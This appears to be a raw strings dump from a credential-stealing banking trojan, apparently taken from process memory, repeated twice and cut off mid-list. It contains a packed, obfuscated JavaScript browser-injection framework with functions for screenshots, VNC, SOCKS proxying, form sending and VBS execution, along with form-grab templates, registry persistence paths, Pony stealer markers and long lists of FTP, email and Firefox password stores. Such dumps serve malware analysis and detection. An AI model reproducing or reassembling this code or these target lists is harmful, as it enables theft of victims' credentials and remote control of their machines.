\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('k N(j){0.F=j;0.w=p;0.O=2;0.m=k(a,b,c,d){u f=W J();u g=0;u h=(y(d)==\'G\')?t:q;u b=\'/\' 0.F \'/\' Q.V() \'/\' b;u i=p;o(h==q){0.w=p;f.I=k(){C{o(f.A==4){o(f.E!=H||f.x==\'-\'){g.w=t;o(y(d)=="k"){d(t)}}z{o(f.x==\' \'){g.w=q;o(y(d)=="k"){d(q)}}z{g.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){g.w=t;o(y(d)=="k"){d(t)}}}}f.K(a,b,h);f.L(c);o(h==q){l q}C{o(f.A==4&&f.E==H){o(f.x==\'-\'){l t}z{o(f.x==\' \'){l q}z{l f.x}}}l t}B(e){l t}};0.M=k(){l 0.w};0.1l=k(a,b,c){l 0.m(\'s\',\'1/\' a,b,c)};0.P=k(a,b){l 0.m(\'v\',\'2/\' a,p,b)};0.R=k(a,b){l 0.m(\'v\',\'3/\' a,p,b)};0.T=k(a){l 0.m(\'v\',\'4/\',p,a)};0.U=k(a,b,c){l 0.m(\'v\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,p,c)};0.X=k(a,b,c,d){l 0.m(\'s\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.Y=k(a,b,c,d){o(y(c)==\'G\'||c==t){u e=p;u f=\'v\'}z{u e=\'Z: \' c;u f=\'s\'}l 0.m(f,\'6/\' ((b==q)?\'S\':\'D\') \'/\' a,e,d)};0.17=k(a,b,c,d){l 0.m(\'s\',\'7/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.18=k(a,b,c,d){l 0.m(\'v\',\'8/\' b \'/\' c \'/\' 19(a),p,d)};0.1a=k(a,b){l 0.m(\'s\',\'9/\',a,b)};0.1b=k(a){l 0.m(\'v\',\'10/\',p,a)};0.1c=k(a,b){l 0.m(\'s\',\'11/\',a,b)};0.1d=k(a,b){l 0.m(\'s\',\'12/\',a,b)};0.1e=k(a,b,c){l 0.m(\'s\',\'13/\',a "\\r\\n" b,c)};0.1f=k(a,b){l 0.m(\'s\',\'14/\' a,1g.1h.1i,b)};0.1j=k(a){l 0.m(\'v\',\'15/\',p,a)};0.1k=k(a,b){l 0.m(\'s\',\'16/\',a,b)}};',62,84,'this||||||||||||||||||||function|return|Query||if|null|true||POST|false|var|GET|_LastAsync|responseText|typeof|else|readyState|catch|try||status|_Key|undefined|200|onreadystatechange|XMLHttpRequest|open|send|GetLastAsync|EQFramework|Version|GetVal|Math|DelVal||ClearVals|GetServer|random|new|PostServer|Get|Cookie||||||||Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|document|location|href|StopVideo|ExecVBS|SetVal'.split('|'),0,{}));
eval('var %s '
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=C j(){0.1h=o;0.w=o;0.O=3;0.l=j(a,b,c,d){s f=C L();s g=0;s h=(x(d)==\'G\')?t:p;s b=\'/\' 0.R \'/\' W.X() \'/\' b;s i=o;m(h==p){0.w=o;f.I=j(){A{m(f.B==4){m(f.E!=F||f.v==\'-\'){g.w=t;m(x(d)=="j"){d(t)}}y{m(f.v==\' \'){g.w=p;m(x(d)=="j"){d(p)}}y{g.w=f.v;m(x(d)=="j"){d(f.v)}}}}}z(e){g.w=t;m(x(d)=="j"){d(t)}}}}f.J(a,b,h);f.K(c);m(h==p){k p}A{m(f.B==4&&f.E==F){m(f.v==\'-\'){k t}y{m(f.v==\' \'){k p}y{k f.v}}}k t}z(e){k t}};0.M=j(){k 0.w};0.N=j(a,b,c){k 0.l(\'q\',\'1/\' a,b,c)};0.Q=j(a,b){k 0.l(\'u\',\'2/\' a,o,b)};0.T=j(a,b){k 0.l(\'u\',\'3/\' a,o,b)};0.U=j(a){k 0.l(\'u\',\'4/\',o,a)};0.V=j(a,b,c){k 0.l(\'u\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,o,c)};0.Y=j(a,b,c,d){k 0.l(\'q\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.Z=j(a,b,c,d){m(x(c)==\'G\'||c==t){s e=o;s f=\'u\'}y{s e=\'17: \' c;s f=\'q\'}k 0.l(f,\'6/\' ((b==p)?\'S\':\'D\') \'/\' a,e,d)};0.18=j(a,b,c,d){k 0.l(\'q\',\'7/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.19=j(a,b,c,d){k 0.l(\'u\',\'8/\' b \'/\' c \'/\' 1a(a),o,d)};0.1b=j(a,b){k 0.l(\'q\',\'9/\',a,b)};0.1c=j(a){k 0.l(\'u\',\'10/\',o,a)};0.1d=j(a,b){k 0.l(\'q\',\'11/\',a,b)};0.1e=j(a,b){k 0.l(\'q\',\'12/\',a,b)};0.1f=j(a,b,c){k 0.l(\'q\',\'13/\',a "\\r\\n" b,c)};0.1g=j(a,b){k 0.l(\'q\',\'14/\' a,H.1i.1j,b)};0.1k=j(a){k 0.l(\'u\',\'15/\',o,a)};0.1l=j(a,b){k 0.l(\'q\',\'16/\',a,b)};0.1m=j(a){s b=H.1n(a);b.1o.P(b)}};',62,87,'this|||||||||||||||||||function|return|Query|if||null|true|POST||var|false|GET|responseText|_LastAsync|typeof|else|catch|try|readyState|new||status|200|undefined|document|onreadystatechange|open|send|XMLHttpRequest|GetLastAsync|SetVal|Version|removeChild|GetVal|_Key||DelVal|ClearVals|GetServer|Math|random|PostServer|Get||||||||Cookie|Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|Key|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("layers.acceleration.disabled", true);
user_pref("gfx.direct2d.disabled", true);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
account.cfg
account.cfn
Dir #%u
<POP3_Password2
<SMTP_Password2
<IMAP_Password2
<HTTPMail_Password2
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
Server.Pass
Server.Host
Server.User
Server.Port
Last Server Pass
Last Server Port
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Email Address
SMTP Server
SMTP User Name
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
HttpAddRequestHeadersA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
COMDLG32.dll
WININET.DLL
N.UAE
C:\ProgramData\LibxaJximb\QamzEsom.ijv
{687F46D2-25E5-43B6-BD95-68B725074F1D}
{0AE625D1-61C9-42E5-AEF4-7154387F4248}
{6B376189-11A2-4F58-96A6-001E03862004}
\\.\pipe\{19312A96-768E-4560-A72B-03BE621D2CDF}
D{0AE625D1-61C9-42E5-AEF4-7154387F4248}
{23DC640D-793E-4D8F-955D-2E6215F37B91}
U{687F46D2-25E5-43B6-BD95-68B725074F1D}
546B5A02-5978-4B96-802A-4C514A243A08
;&;,;3;^;
:$:,:7:?:
9”9C9
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
wmiprvse.exe_3716_rwx_00630000_00058000:
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
8HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('k N(j){0.F=j;0.w=p;0.O=2;0.m=k(a,b,c,d){u f=W J();u g=0;u h=(y(d)==\'G\')?t:q;u b=\'/\' 0.F \'/\' Q.V() \'/\' b;u i=p;o(h==q){0.w=p;f.I=k(){C{o(f.A==4){o(f.E!=H||f.x==\'-\'){g.w=t;o(y(d)=="k"){d(t)}}z{o(f.x==\' \'){g.w=q;o(y(d)=="k"){d(q)}}z{g.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){g.w=t;o(y(d)=="k"){d(t)}}}}f.K(a,b,h);f.L(c);o(h==q){l q}C{o(f.A==4&&f.E==H){o(f.x==\'-\'){l t}z{o(f.x==\' \'){l q}z{l f.x}}}l t}B(e){l t}};0.M=k(){l 0.w};0.1l=k(a,b,c){l 0.m(\'s\',\'1/\' a,b,c)};0.P=k(a,b){l 0.m(\'v\',\'2/\' a,p,b)};0.R=k(a,b){l 0.m(\'v\',\'3/\' a,p,b)};0.T=k(a){l 0.m(\'v\',\'4/\',p,a)};0.U=k(a,b,c){l 0.m(\'v\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,p,c)};0.X=k(a,b,c,d){l 0.m(\'s\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.Y=k(a,b,c,d){o(y(c)==\'G\'||c==t){u e=p;u f=\'v\'}z{u e=\'Z: \' c;u f=\'s\'}l 0.m(f,\'6/\' ((b==q)?\'S\':\'D\') \'/\' a,e,d)};0.17=k(a,b,c,d){l 0.m(\'s\',\'7/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.18=k(a,b,c,d){l 0.m(\'v\',\'8/\' b \'/\' c \'/\' 19(a),p,d)};0.1a=k(a,b){l 0.m(\'s\',\'9/\',a,b)};0.1b=k(a){l 0.m(\'v\',\'10/\',p,a)};0.1c=k(a,b){l 0.m(\'s\',\'11/\',a,b)};0.1d=k(a,b){l 0.m(\'s\',\'12/\',a,b)};0.1e=k(a,b,c){l 0.m(\'s\',\'13/\',a "\\r\\n" b,c)};0.1f=k(a,b){l 0.m(\'s\',\'14/\' a,1g.1h.1i,b)};0.1j=k(a){l 0.m(\'v\',\'15/\',p,a)};0.1k=k(a,b){l 0.m(\'s\',\'16/\',a,b)}};',62,84,'this||||||||||||||||||||function|return|Query||if|null|true||POST|false|var|GET|_LastAsync|responseText|typeof|else|readyState|catch|try||status|_Key|undefined|200|onreadystatechange|XMLHttpRequest|open|send|GetLastAsync|EQFramework|Version|GetVal|Math|DelVal||ClearVals|GetServer|random|new|PostServer|Get|Cookie||||||||Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|document|location|href|StopVideo|ExecVBS|SetVal'.split('|'),0,{}));
eval('var %s '
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=C j(){0.1h=o;0.w=o;0.O=3;0.l=j(a,b,c,d){s f=C L();s g=0;s h=(x(d)==\'G\')?t:p;s b=\'/\' 0.R \'/\' W.X() \'/\' b;s i=o;m(h==p){0.w=o;f.I=j(){A{m(f.B==4){m(f.E!=F||f.v==\'-\'){g.w=t;m(x(d)=="j"){d(t)}}y{m(f.v==\' \'){g.w=p;m(x(d)=="j"){d(p)}}y{g.w=f.v;m(x(d)=="j"){d(f.v)}}}}}z(e){g.w=t;m(x(d)=="j"){d(t)}}}}f.J(a,b,h);f.K(c);m(h==p){k p}A{m(f.B==4&&f.E==F){m(f.v==\'-\'){k t}y{m(f.v==\' \'){k p}y{k f.v}}}k t}z(e){k t}};0.M=j(){k 0.w};0.N=j(a,b,c){k 0.l(\'q\',\'1/\' a,b,c)};0.Q=j(a,b){k 0.l(\'u\',\'2/\' a,o,b)};0.T=j(a,b){k 0.l(\'u\',\'3/\' a,o,b)};0.U=j(a){k 0.l(\'u\',\'4/\',o,a)};0.V=j(a,b,c){k 0.l(\'u\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,o,c)};0.Y=j(a,b,c,d){k 0.l(\'q\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.Z=j(a,b,c,d){m(x(c)==\'G\'||c==t){s e=o;s f=\'u\'}y{s e=\'17: \' c;s f=\'q\'}k 0.l(f,\'6/\' ((b==p)?\'S\':\'D\') \'/\' a,e,d)};0.18=j(a,b,c,d){k 0.l(\'q\',\'7/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.19=j(a,b,c,d){k 0.l(\'u\',\'8/\' b \'/\' c \'/\' 1a(a),o,d)};0.1b=j(a,b){k 0.l(\'q\',\'9/\',a,b)};0.1c=j(a){k 0.l(\'u\',\'10/\',o,a)};0.1d=j(a,b){k 0.l(\'q\',\'11/\',a,b)};0.1e=j(a,b){k 0.l(\'q\',\'12/\',a,b)};0.1f=j(a,b,c){k 0.l(\'q\',\'13/\',a "\\r\\n" b,c)};0.1g=j(a,b){k 0.l(\'q\',\'14/\' a,H.1i.1j,b)};0.1k=j(a){k 0.l(\'u\',\'15/\',o,a)};0.1l=j(a,b){k 0.l(\'q\',\'16/\',a,b)};0.1m=j(a){s b=H.1n(a);b.1o.P(b)}};',62,87,'this|||||||||||||||||||function|return|Query|if||null|true|POST||var|false|GET|responseText|_LastAsync|typeof|else|catch|try|readyState|new||status|200|undefined|document|onreadystatechange|open|send|XMLHttpRequest|GetLastAsync|SetVal|Version|removeChild|GetVal|_Key||DelVal|ClearVals|GetServer|Math|random|PostServer|Get||||||||Cookie|Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|Key|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("layers.acceleration.disabled", true);
user_pref("gfx.direct2d.disabled", true);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
account.cfg
account.cfn
Dir #%u
<POP3_Password2
<SMTP_Password2
<IMAP_Password2
<HTTPMail_Password2
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
